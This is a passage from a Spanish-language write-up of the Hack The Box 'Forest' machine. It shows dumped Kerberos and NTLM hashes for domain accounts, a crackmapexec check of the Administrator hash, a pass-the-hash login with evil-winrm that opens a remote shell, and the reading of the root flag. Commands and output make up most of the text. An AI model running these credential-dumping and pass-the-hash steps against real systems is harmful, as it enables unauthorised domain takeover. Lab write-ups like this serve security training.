htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
usuario1:aes256-cts-hmac-sha1-96:808c517fe21dea4ab2a8b2df13a1adc7f02b573e543306928602c066721119d5
usuario1:aes128-cts-hmac-sha1-96:4ce5c19978a6f818c747d9c23c9c23a8
usuario1:des-cbc-md5:f89dead94a107f9d
t0mz:aes256-cts-hmac-sha1-96:4aad71a2616b416327654031673d110e54e69ac86603fc3e93d797f88aaa92a9
t0mz:aes128-cts-hmac-sha1-96:e4f34db48a803e84957b624beec3eb5e
t0mz:des-cbc-md5:64a86b191032cb4f
FOREST$:aes256-cts-hmac-sha1-96:78a8830a052fe6760409059f38e7423d4635e6ed3cfcd55c30d05c90df9abf80
FOREST$:aes128-cts-hmac-sha1-96:38bffd60a3d1db7391cb1652f5efc4a1
FOREST$:des-cbc-md5:e9fddf982f40894f
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

Como podemos ver nos dumpeo todos los hashes de las contraseñas de todos los usuarios del entorno de directorio activo de esta maquina

A nostros el hash que nos interesa es el hash del usuario "Administrator":

htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

Podemos ver que tambien tenemos el hash NTDS:

32693b11e6aa90eb43d32c72a07ceea6

`3.4 Pass-The-Hash`

Ahora vamos a realizar un Pass-The-Hash con este Hash NTDS del usuario Administrator, para eso vamos a verificar si con el hash NTDS podemos logearnos mediante "evil-winrm", para eso utilizaremos la herramienta "crackmapexec":

crackmapexec winrm 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# crackmapexec winrm 10.10.10.161 -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
SMB         10.10.10.161    5985   FOREST           [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\Administrator:32693b11e6aa90eb43d32c72a07ceea6 (Pwn3d!)
                                                                                                                             
┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─#

(Recordar utilizar el parametro -H y no el -p, ya que estamos especificandole el hash, no la contraseña)

Usuario: Administrator
Hash NTDS: 32693b11e6aa90eb43d32c72a07ceea6

Podemos ver que nos dice que es el hash correcto, por lo que ahora mismo, podríamos entrar con "evil-winrm" con este hash NTDS, y aqui es donde entra el pass-the-hash, en vez de pasarle la contraseña como parámetro a evil-winrm, le especificamos con el parámetro -H, el hash NTDS

evil-winrm -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6' -i 10.10.10.161

┌──(root㉿kali)-[/home/t0mz/ctf/forest]
└─# evil-winrm -u 'Administrator' -H '32693b11e6aa90eb43d32c72a07ceea6' -i 10.10.10.161
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

`3.5 Obtención de la flag root`

La flag de root, se encuentra dentro de la ruta absoluta "C:\Users\Administrator\Desktop\root.txt":

*Evil-WinRM* PS C:\Users\Administrator\Documents> type "C:\Users\Administrator\Desktop\root.txt"
1b7e7fefc9f30bf92edc3df2855856cd
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Con esto, concluimos la maquina "Forest" de Hack The Box

Espero te haya sido de ayuda este Write Up :)

Si tuviste alguna dificultad a la hora de resolverlo, no olvides contactarme en mis redes sociales

https://www.hackthebox.com/achievement/machine/2243466/212www.hackthebox.com

AnteriorBlocky [EASY🟢]SiguienteSau [EASY🟢]

Última actualización hace 9 meses